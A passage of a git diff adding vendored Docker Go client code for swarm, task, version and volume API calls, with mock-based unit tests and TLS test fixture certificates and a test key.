diff --git a/vendor/github.com/docker/docker/client/swarm_join_test.go b/vendor/github.com/docker/docker/client/swarm_join_test.go
new file mode 100644
index 0000000000..31ef2a76ee
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_join_test.go
@@ -0,0 +1,51 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/swarm"
+)
+
+func TestSwarmJoinError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.SwarmJoin(context.Background(), swarm.JoinRequest{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestSwarmJoin(t *testing.T) {
+	expectedURL := "/swarm/join"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.SwarmJoin(context.Background(), swarm.JoinRequest{
+		ListenAddr: "0.0.0.0:2377",
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_leave.go b/vendor/github.com/docker/docker/client/swarm_leave.go
new file mode 100644
index 0000000000..a4df732174
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_leave.go
@@ -0,0 +1,18 @@
+package client
+
+import (
+	"net/url"
+
+	"golang.org/x/net/context"
+)
+
+// SwarmLeave leaves the Swarm.
+func (cli *Client) SwarmLeave(ctx context.Context, force bool) error {
+	query := url.Values{}
+	if force {
+		query.Set("force", "1")
+	}
+	resp, err := cli.post(ctx, "/swarm/leave", query, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_leave_test.go b/vendor/github.com/docker/docker/client/swarm_leave_test.go
new file mode 100644
index 0000000000..c96dac8120
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_leave_test.go
@@ -0,0 +1,66 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestSwarmLeaveError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.SwarmLeave(context.Background(), false)
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestSwarmLeave(t *testing.T) {
+	expectedURL := "/swarm/leave"
+
+	leaveCases := []struct {
+		force         bool
+		expectedForce string
+	}{
+		{
+			expectedForce: "",
+		},
+		{
+			force:         true,
+			expectedForce: "1",
+		},
+	}
+
+	for _, leaveCase := range leaveCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				if req.Method != "POST" {
+					return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+				}
+				force := req.URL.Query().Get("force")
+				if force != leaveCase.expectedForce {
+					return nil, fmt.Errorf("force not set in URL query properly. expected '%s', got %s", leaveCase.expectedForce, force)
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+				}, nil
+			}),
+		}
+
+		err := client.SwarmLeave(context.Background(), leaveCase.force)
+		if err != nil {
+			t.Fatal(err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_unlock.go b/vendor/github.com/docker/docker/client/swarm_unlock.go
new file mode 100644
index 0000000000..addfb59f0a
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_unlock.go
@@ -0,0 +1,17 @@
+package client
+
+import (
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// SwarmUnlock unlockes locked swarm.
+func (cli *Client) SwarmUnlock(ctx context.Context, req swarm.UnlockRequest) error {
+	serverResp, err := cli.post(ctx, "/swarm/unlock", nil, req, nil)
+	if err != nil {
+		return err
+	}
+
+	ensureReaderClosed(serverResp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_update.go b/vendor/github.com/docker/docker/client/swarm_update.go
new file mode 100644
index 0000000000..cc8eeb6554
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_update.go
@@ -0,0 +1,22 @@
+package client
+
+import (
+	"fmt"
+	"net/url"
+	"strconv"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// SwarmUpdate updates the Swarm.
+func (cli *Client) SwarmUpdate(ctx context.Context, version swarm.Version, swarm swarm.Spec, flags swarm.UpdateFlags) error {
+	query := url.Values{}
+	query.Set("version", strconv.FormatUint(version.Index, 10))
+	query.Set("rotateWorkerToken", fmt.Sprintf("%v", flags.RotateWorkerToken))
+	query.Set("rotateManagerToken", fmt.Sprintf("%v", flags.RotateManagerToken))
+	query.Set("rotateManagerUnlockKey", fmt.Sprintf("%v", flags.RotateManagerUnlockKey))
+	resp, err := cli.post(ctx, "/swarm/update", query, swarm, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_update_test.go b/vendor/github.com/docker/docker/client/swarm_update_test.go
new file mode 100644
index 0000000000..3b23db078f
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_update_test.go
@@ -0,0 +1,49 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/swarm"
+)
+
+func TestSwarmUpdateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.SwarmUpdate(context.Background(), swarm.Version{}, swarm.Spec{}, swarm.UpdateFlags{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestSwarmUpdate(t *testing.T) {
+	expectedURL := "/swarm/update"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.SwarmUpdate(context.Background(), swarm.Version{}, swarm.Spec{}, swarm.UpdateFlags{})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/task_inspect.go b/vendor/github.com/docker/docker/client/task_inspect.go
new file mode 100644
index 0000000000..bc8058fc32
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/task_inspect.go
@@ -0,0 +1,34 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"net/http"
+
+	"github.com/docker/docker/api/types/swarm"
+
+	"golang.org/x/net/context"
+)
+
+// TaskInspectWithRaw returns the task information and its raw representation..
+func (cli *Client) TaskInspectWithRaw(ctx context.Context, taskID string) (swarm.Task, []byte, error) {
+	serverResp, err := cli.get(ctx, "/tasks/"+taskID, nil, nil)
+	if err != nil {
+		if serverResp.statusCode == http.StatusNotFound {
+			return swarm.Task{}, nil, taskNotFoundError{taskID}
+		}
+		return swarm.Task{}, nil, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	body, err := ioutil.ReadAll(serverResp.body)
+	if err != nil {
+		return swarm.Task{}, nil, err
+	}
+
+	var response swarm.Task
+	rdr := bytes.NewReader(body)
+	err = json.NewDecoder(rdr).Decode(&response)
+	return response, body, err
+}
diff --git a/vendor/github.com/docker/docker/client/task_inspect_test.go b/vendor/github.com/docker/docker/client/task_inspect_test.go
new file mode 100644
index 0000000000..148cdad3a7
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/task_inspect_test.go
@@ -0,0 +1,54 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+func TestTaskInspectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, _, err := client.TaskInspectWithRaw(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestTaskInspect(t *testing.T) {
+	expectedURL := "/tasks/task_id"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			content, err := json.Marshal(swarm.Task{
+				ID: "task_id",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	taskInspect, _, err := client.TaskInspectWithRaw(context.Background(), "task_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if taskInspect.ID != "task_id" {
+		t.Fatalf("expected `task_id`, got %s", taskInspect.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/task_list.go b/vendor/github.com/docker/docker/client/task_list.go
new file mode 100644
index 0000000000..66324da959
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/task_list.go
@@ -0,0 +1,35 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// TaskList returns the list of tasks.
+func (cli *Client) TaskList(ctx context.Context, options types.TaskListOptions) ([]swarm.Task, error) {
+	query := url.Values{}
+
+	if options.Filters.Len() > 0 {
+		filterJSON, err := filters.ToParam(options.Filters)
+		if err != nil {
+			return nil, err
+		}
+
+		query.Set("filters", filterJSON)
+	}
+
+	resp, err := cli.get(ctx, "/tasks", query, nil)
+	if err != nil {
+		return nil, err
+	}
+
+	var tasks []swarm.Task
+	err = json.NewDecoder(resp.body).Decode(&tasks)
+	ensureReaderClosed(resp)
+	return tasks, err
+}
diff --git a/vendor/github.com/docker/docker/client/task_list_test.go b/vendor/github.com/docker/docker/client/task_list_test.go
new file mode 100644
index 0000000000..2a9a4c4346
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/task_list_test.go
@@ -0,0 +1,94 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+func TestTaskListError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.TaskList(context.Background(), types.TaskListOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestTaskList(t *testing.T) {
+	expectedURL := "/tasks"
+
+	filters := filters.NewArgs()
+	filters.Add("label", "label1")
+	filters.Add("label", "label2")
+
+	listCases := []struct {
+		options             types.TaskListOptions
+		expectedQueryParams map[string]string
+	}{
+		{
+			options: types.TaskListOptions{},
+			expectedQueryParams: map[string]string{
+				"filters": "",
+			},
+		},
+		{
+			options: types.TaskListOptions{
+				Filters: filters,
+			},
+			expectedQueryParams: map[string]string{
+				"filters": `{"label":{"label1":true,"label2":true}}`,
+			},
+		},
+	}
+	for _, listCase := range listCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				for key, expected := range listCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+				content, err := json.Marshal([]swarm.Task{
+					{
+						ID: "task_id1",
+					},
+					{
+						ID: "task_id2",
+					},
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}),
+		}
+
+		tasks, err := client.TaskList(context.Background(), listCase.options)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(tasks) != 2 {
+			t.Fatalf("expected 2 tasks, got %v", tasks)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/testdata/ca.pem b/vendor/github.com/docker/docker/client/testdata/ca.pem
new file mode 100644
index 0000000000..ad14d47065
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/testdata/ca.pem
@@ -0,0 +1,18 @@
+-----BEGIN CERTIFICATE-----
+MIIC0jCCAbqgAwIBAgIRAILlP5WWLaHkQ/m2ASHP7SowDQYJKoZIhvcNAQELBQAw
+EjEQMA4GA1UEChMHdmluY2VudDAeFw0xNjAzMjQxMDE5MDBaFw0xOTAzMDkxMDE5
+MDBaMBIxEDAOBgNVBAoTB3ZpbmNlbnQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAw
+ggEKAoIBAQD0yZPKAGncoaxaU/QW9tWEHbrvDoGVF/65L8Si/jBrlAgLjhmmV1di
+vKG9QPzuU8snxHro3/uCwyA6kTqw0U8bGwHxJq2Bpa6JBYj8N2jMJ+M+sjXgSo2t
+E0zIzjTW2Pir3C8qwfrVL6NFp9xClwMD23SFZ0UsEH36NkfyrKBVeM8IOjJd4Wjs
+xIcuvF3BTVkji84IJBW2JIKf9ZrzJwUlSCPgptRp4Evdbyp5d+UPxtwxD7qjW4lM
+yQQ8vfcC4lKkVx5s/RNJ4fzd5uEgLdEbZ20qt7Zt/bLcxFHpUhH2teA0QjmrOWFh
+gbL83s95/+hbSVhsO4hoFW7vTeiCCY4xAgMBAAGjIzAhMA4GA1UdDwEB/wQEAwIC
+rDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBY51RHajuDuhO2
+tcm26jeNROzfffnjhvbOVPjSEdo9vI3JpMU/RuQw+nbNcLwJrdjL6UH7tD/36Y+q
+NXH+xSIjWFH0zXGxrIUsVrvt6f8CbOvw7vD+gygOG+849PDQMbL6czP8rvXY7vZV
+9pdpQfrENk4b5kePRW/6HaGSTvtgN7XOrYD9fp3pm/G534T2e3IxgYMRNwdB9Ul9
+bLwMqQqf4eiqqMs6x4IVmZUkGVMKiFKcvkNg9a+Ozx5pMizHeAezWMcZ5V+QJZVT
+8lElSCKZ2Yy2xkcl7aeQMLwcAeZwfTp+Yu9dVzlqXiiBTLd1+LtAQCuKHzmw4Q8k
+EvD5m49l
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/client/testdata/cert.pem b/vendor/github.com/docker/docker/client/testdata/cert.pem
new file mode 100644
index 0000000000..9000ffb32b
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/testdata/cert.pem
@@ -0,0 +1,18 @@
+-----BEGIN CERTIFICATE-----
+MIIC8DCCAdigAwIBAgIRAJAS1glgcke4q7eCaretwgUwDQYJKoZIhvcNAQELBQAw
+EjEQMA4GA1UEChMHdmluY2VudDAeFw0xNjAzMjQxMDE5MDBaFw0xOTAzMDkxMDE5
+MDBaMB4xHDAaBgNVBAoME3ZpbmNlbnQuPGJvb3RzdHJhcD4wggEiMA0GCSqGSIb3
+DQEBAQUAA4IBDwAwggEKAoIBAQClpvG442dGEvrRgmCrqY4kBml1LVlw2Y7ZDn6B
+TKa52+MuGDmfXbO1UhclNqTXjLgAwKjPz/OvnPRxNEUoQEDbBd+Xev7rxTY5TvYI
+27YH3fMH2LL2j62jum649abfhZ6ekD5eD8tCn3mnrEOgqRIlK7efPIVixq/ZqU1H
+7ez0ggB7dmWHlhnUaxyQOCSnAX/7nKYQXqZgVvGhDeR2jp7GcnhbK/qPrZ/mOm83
+2IjCeYN145opYlzTSp64GYIZz7uqMNcnDKK37ZbS8MYcTjrRaHEiqZVVdIC+ghbx
+qYqzbZRVfgztI9jwmifn0mYrN4yt+nhNYwBcRJ4Pv3uLFbo7AgMBAAGjNTAzMA4G
+A1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAA
+MA0GCSqGSIb3DQEBCwUAA4IBAQDg1r7nksjYgDFYEcBbrRrRHddIoK+RVmSBTTrq
+8giC77m0srKdh9XTVWK1PUbGfODV1oD8m9QhPE8zPDyYQ8jeXNRSU5wXdkrTRmmY
+w/T3SREqmE7CObMtusokHidjYFuqqCR07sJzqBKRlzr3o0EGe3tuEhUlF5ARY028
+eipaDcVlT5ChGcDa6LeJ4e05u4cVap0dd6Rp1w3Rx1AYAecdgtgBMnw1iWdl/nrC
+sp26ZXNaAhFOUovlY9VY257AMd9hQV7WvAK4yNEHcckVu3uXTBmDgNSOPtl0QLsL
+Kjlj75ksCx8nCln/hCut/0+kGTsGZqdV5c6ktgcGYRir/5Hs
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/client/testdata/key.pem b/vendor/github.com/docker/docker/client/testdata/key.pem
new file mode 100644
index 0000000000..c0869dfc1a
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/testdata/key.pem
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEowIBAAKCAQEApabxuONnRhL60YJgq6mOJAZpdS1ZcNmO2Q5+gUymudvjLhg5
+n12ztVIXJTak14y4AMCoz8/zr5z0cTRFKEBA2wXfl3r+68U2OU72CNu2B93zB9iy
+9o+to7puuPWm34WenpA+Xg/LQp95p6xDoKkSJSu3nzyFYsav2alNR+3s9IIAe3Zl
+h5YZ1GsckDgkpwF/+5ymEF6mYFbxoQ3kdo6exnJ4Wyv6j62f5jpvN9iIwnmDdeOa
+KWJc00qeuBmCGc+7qjDXJwyit+2W0vDGHE460WhxIqmVVXSAvoIW8amKs22UVX4M
+7SPY8Jon59JmKzeMrfp4TWMAXESeD797ixW6OwIDAQABAoIBAHfyAAleL8NfrtnR
+S+pApbmUIvxD0AWUooispBE/zWG6xC72P5MTqDJctIGvpYCmVf3Fgvamns7EGYN2
+07Sngc6V3Ca1WqyhaffpIuGbJZ1gqr89u6gotRRexBmNVj13ZTlvPJmjWgxtqQsu
+AvHsOkVL+HOGwRaaw24Z1umEcBVCepl7PGTqsLeJUtBUZBiqdJTu4JYLAB6BggBI
+OxhHoTWvlNWwzezo2C/IXkXcXD/tp3i5vTn5rAXHSMQkdMAUh7/xJ73Fl36gxZhp
+W7NoPKaS9qNh8jhs6p54S7tInb6+mrKtvRFKl5XAR3istXrXteT5UaukpuBbQ/5d
+qf4BXuECgYEAzoOKxMee5tG/G9iC6ImNq5xGAZm0OnmteNgIEQj49If1Q68av525
+FioqdC9zV+blfHQqXEIUeum4JAou4xqmB8Lw2H0lYwOJ1IkpUy3QJjU1IrI+U5Qy
+ryZuA9cxSTLf1AJFbROsoZDpjaBh0uUQkD/4PHpwXMgHu/3CaJ4nTEkCgYEAzVjE
+VWgczWJGyRxmHSeR51ft1jrlChZHEd3HwgLfo854JIj+MGUH4KPLSMIkYNuyiwNQ
+W7zdXCB47U8afSL/lPTv1M5+ZsWY6sZAT6gtp/IeU0Va943h9cj10fAOBJaz1H6M
+jnZS4jjWhVInE7wpCDVCwDRoHHJ84kb6JeflamMCgYBDQDcKie9HP3q6uLE4xMKr
+5gIuNz2n5UQGnGNUGNXp2/SVDArr55MEksqsd19aesi01KeOz74XoNDke6R1NJJo
+6KTB+08XhWl3GwuoGL02FBGvsNf3I8W1oBAnlAZqzfRx+CNfuA55ttU318jDgvD3
+6L0QBNdef411PNf4dbhacQKBgAd/e0PHFm4lbYJAaDYeUMSKwGN3KQ/SOmwblgSu
+iC36BwcGfYmU1tHMCUsx05Q50W4kA9Ylskt/4AqCPexdz8lHnE4/7/uesXO5I3YF
+JQ2h2Jufx6+MXbjUyq0Mv+ZI/m3+5PD6vxIFk0ew9T5SO4lSMIrGHxsSzx6QCuhB
+bG4TAoGBAJ5PWG7d2CyCjLtfF8J4NxykRvIQ8l/3kDvDdNrXiXbgonojo2lgRYaM
+5LoK9ApN8KHdedpTRipBaDA22Sp5SjMcUE7A6q42PJCL9r+BRYF0foFQx/rqpCff
+pVWKgwIPoKnfxDqN1RUgyFcx1jbA3XVJZCuT+wbMuDQ9nlvulD1W
+-----END RSA PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/client/transport.go b/vendor/github.com/docker/docker/client/transport.go
new file mode 100644
index 0000000000..f04e601649
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/transport.go
@@ -0,0 +1,28 @@
+package client
+
+import (
+	"crypto/tls"
+	"errors"
+	"net/http"
+)
+
+var errTLSConfigUnavailable = errors.New("TLSConfig unavailable")
+
+// transportFunc allows us to inject a mock transport for testing. We define it
+// here so we can detect the tlsconfig and return nil for only this type.
+type transportFunc func(*http.Request) (*http.Response, error)
+
+func (tf transportFunc) RoundTrip(req *http.Request) (*http.Response, error) {
+	return tf(req)
+}
+
+// resolveTLSConfig attempts to resolve the tls configuration from the
+// RoundTripper.
+func resolveTLSConfig(transport http.RoundTripper) *tls.Config {
+	switch tr := transport.(type) {
+	case *http.Transport:
+		return tr.TLSClientConfig
+	default:
+		return nil
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/utils.go b/vendor/github.com/docker/docker/client/utils.go
new file mode 100644
index 0000000000..23d520ecb8
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/utils.go
@@ -0,0 +1,33 @@
+package client
+
+import (
+	"github.com/docker/docker/api/types/filters"
+	"net/url"
+	"regexp"
+)
+
+var headerRegexp = regexp.MustCompile(`\ADocker/.+\s\((.+)\)\z`)
+
+// getDockerOS returns the operating system based on the server header from the daemon.
+func getDockerOS(serverHeader string) string {
+	var osType string
+	matches := headerRegexp.FindStringSubmatch(serverHeader)
+	if len(matches) > 0 {
+		osType = matches[1]
+	}
+	return osType
+}
+
+// getFiltersQuery returns a url query with "filters" query term, based on the
+// filters provided.
+func getFiltersQuery(f filters.Args) (url.Values, error) {
+	query := url.Values{}
+	if f.Len() > 0 {
+		filterJSON, err := filters.ToParam(f)
+		if err != nil {
+			return query, err
+		}
+		query.Set("filters", filterJSON)
+	}
+	return query, nil
+}
diff --git a/vendor/github.com/docker/docker/client/version.go b/vendor/github.com/docker/docker/client/version.go
new file mode 100644
index 0000000000..933ceb4a49
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/version.go
@@ -0,0 +1,21 @@
+package client
+
+import (
+	"encoding/json"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// ServerVersion returns information of the docker client and server host.
+func (cli *Client) ServerVersion(ctx context.Context) (types.Version, error) {
+	resp, err := cli.get(ctx, "/version", nil, nil)
+	if err != nil {
+		return types.Version{}, err
+	}
+
+	var server types.Version
+	err = json.NewDecoder(resp.body).Decode(&server)
+	ensureReaderClosed(resp)
+	return server, err
+}
diff --git a/vendor/github.com/docker/docker/client/volume_create.go b/vendor/github.com/docker/docker/client/volume_create.go
new file mode 100644
index 0000000000..9620c87cbf
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/volume_create.go
@@ -0,0 +1,21 @@
+package client
+
+import (
+	"encoding/json"
+
+	"github.com/docker/docker/api/types"
+	volumetypes "github.com/docker/docker/api/types/volume"
+	"golang.org/x/net/context"
+)
+
+// VolumeCreate creates a volume in the docker host.
+func (cli *Client) VolumeCreate(ctx context.Context, options volumetypes.VolumesCreateBody) (types.Volume, error) {
+	var volume types.Volume
+	resp, err := cli.post(ctx, "/volumes/create", nil, options, nil)
+	if err != nil {
+		return volume, err
+	}
+	err = json.NewDecoder(resp.body).Decode(&volume)
+	ensureReaderClosed(resp)
+	return volume, err
+}
diff --git a/vendor/github.com/docker/docker/client/volume_create_test.go b/vendor/github.com/docker/docker/client/volume_create_test.go
new file mode 100644
index 0000000000..9f1b2540b5
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/volume_create_test.go
@@ -0,0 +1,75 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	volumetypes "github.com/docker/docker/api/types/volume"
+	"golang.org/x/net/context"
+)
+
+func TestVolumeCreateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.VolumeCreate(context.Background(), volumetypes.VolumesCreateBody{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestVolumeCreate(t *testing.T) {
+	expectedURL := "/volumes/create"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+
+			content, err := json.Marshal(types.Volume{
+				Name:       "volume",
+				Driver:     "local",
+				Mountpoint: "mountpoint",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	volume, err := client.VolumeCreate(context.Background(), volumetypes.VolumesCreateBody{
+		Name:   "myvolume",
+		Driver: "mydriver",
+		DriverOpts: map[string]string{
+			"opt-key": "opt-value",
+		},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if volume.Name != "volume" {
+		t.Fatalf("expected volume.Name to be 'volume', got %s", volume.Name)
+	}
+	if volume.Driver != "local" {
+		t.Fatalf("expected volume.Driver to be 'local', got %s", volume.Driver)
+	}
+	if volume.Mountpoint != "mountpoint" {
+		t.Fatalf("expected volume.Mountpoint to be 'mountpoint', got %s", volume.Mountpoint)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/volume_inspect.go b/vendor/github.com/docker/docker/client/volume_inspect.go
new file mode 100644
index 0000000000..3860e9b22c
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/volume_inspect.go
@@ -0,0 +1,38 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"net/http"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// VolumeInspect returns the information about a specific volume in the docker host.
+func (cli *Client) VolumeInspect(ctx context.Context, volumeID string) (types.Volume, error) {
+	volume, _, err := cli.VolumeInspectWithRaw(ctx, volumeID)
+	return volume, err
+}
+
+// VolumeInspectWithRaw returns the information about a specific volume in the docker host and its raw representation
+func (cli *Client) VolumeInspectWithRaw(ctx context.Context, volumeID string) (types.Volume, []byte, error) {
+	var volume types.Volume
+	resp, err := cli.get(ctx, "/volumes/"+volumeID, nil, nil)
+	if err != nil {
+		if resp.statusCode == http.StatusNotFound {
+			return volume, nil, volumeNotFoundError{volumeID}
+		}
+		return volume, nil, err
+	}
+	defer ensureReaderClosed(resp)
+
+	body, err := ioutil.ReadAll(resp.body)
+	if err != nil {
+		return volume, nil, err
+	}
+	rdr := bytes.NewReader(body)
+	err = json.NewDecoder(rdr).Decode(&volume)
+	return volume, body, err
+}
diff --git a/vendor/github.com/docker/docker/client/volume_inspect_test.go b/vendor/github.com/docker/docker/client/volume_inspect_test.go
new file mode 100644
index 0000000000..0d1d118828
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/volume_inspect_test.go
@@ -0,0 +1,76 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestVolumeInspectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.VolumeInspect(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestVolumeInspectNotFound(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
+	}
+
+	_, err := client.VolumeInspect(context.Background(), "unknown")
+	if err == nil || !IsErrVolumeNotFound(err) {
+		t.Fatalf("expected a volumeNotFound error, got %v", err)
+	}
+}
+
+func TestVolumeInspect(t *testing.T) {
+	expectedURL := "/volumes/volume_id"
+	client := &Client{
